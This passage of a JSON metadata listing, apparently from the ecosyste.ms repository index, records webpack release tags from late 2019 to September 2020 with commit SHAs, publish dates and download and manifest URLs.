c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codel